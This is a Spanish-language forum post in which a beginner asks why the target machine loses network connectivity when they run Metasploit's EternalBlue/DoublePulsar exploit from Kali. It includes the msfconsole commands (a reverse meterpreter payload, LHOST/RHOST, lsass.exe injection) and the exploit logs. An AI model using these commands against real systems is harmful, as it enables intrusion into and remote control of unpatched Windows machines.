Hola ,realmente soy bastante nuevo en esto pero hace poco volvi a retomar el tema e instale mi Kali en VMware ,el problema es que cuando utilizo el Metasploit ,a la hora de ejecutar el exploit pierdo la conectividad con el equipo atacado deja de dar ping ,e chequeado para ver si el equipo da pantallazo azul o algo pero no sigue encendido y trabajando normal ,y mi Windows sigue teniendo conectividad con el .Sin embargo cuando cambio la ip del Kali luego de haber ejecutado el exploit vuelve a recuperar la conexion con el otro Equipo .La Maquina Virtual esta en Bridged .Aqui les dejo el Log
msf > use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(windows/smb/eternalblue_doublepulsar)
msf exploit(windows/smb/eternalblue_doublepulsar) > set PAYLOAD windows/x64/meterpreter/reverse_http
PAYLOAD => windows/x64/meterpreter/reverse_http
msf exploit(windows/smb/eternalblue_doublepulsar) > set LHOST 192.168.0.122
LHOST => 192.168.0.122
msf exploit(windows/smb/eternalblue_doublepulsar) > set RHOST 192.168.0.100
RHOST => 192.168.0.100
msf exploit(windows/smb/eternalblue_doublepulsar) > set TARGETARCHITECTURE x64
TARGETARCHITECTURE => x64
msf exploit(windows/smb/eternalblue_doublepulsar) > set PROCESSINJECT lsass.exe
PROCESSINJECT => lsass.exe
- Started HTTP reverse handler on http://192.168.0.122:8080
- 192.168.0.100:445 - Generating Eternalblue XML data
- 192.168.0.100:445 - Generating Doublepulsar XML data
- 192.168.0.100:445 - Generating payload DLL for Doublepulsar
- 192.168.0.100:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
- 192.168.0.100:445 - Launching Eternalblue...
Aqui en este momento deja de dar ping el otro equipo aunque sigue encendido y trabajando bien
de igual manera al utilizar ms17 sucede lo siguiente
- Started reverse TCP handler on 192.168.0.24:4444
- 192.168.0.100:445 - Connecting to target for exploitation.
- 192.168.0.100:445 - Connection established for exploitation.
- 192.168.0.100:445 - Target OS selected valid for OS indicated by SMB reply
- 192.168.0.100:445 - CORE raw buffer dump (38 bytes)
- 192.168.0.100:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
- 192.168.0.100:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
- 192.168.0.100:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
- 192.168.0.100:445 - Target arch selected valid for arch indicated by DCE/RPC reply
- 192.168.0.100:445 - Trying exploit with 12 Groom Allocations.
- 192.168.0.100:445 - Sending all but last fragment of exploit packet
Y asi en ese momento vuelve a perder la conexion con el equipo y debo cambiar de ip , pero es solo con el equipo al que ataco
Por favor si alguien sabe que esta pasando o que pueda estar pasando que me de la Luz jaja ,porque realmente me siento Frustrado con esto .Gracias de antemano y saludos
algien ola ola ,nadie
porque estoy solito no hay nadie aqui que me ayude lalalala
MOD: No hacer doble post. Usa el botón modificar.
User:oki oki uso el boton de modificar xD.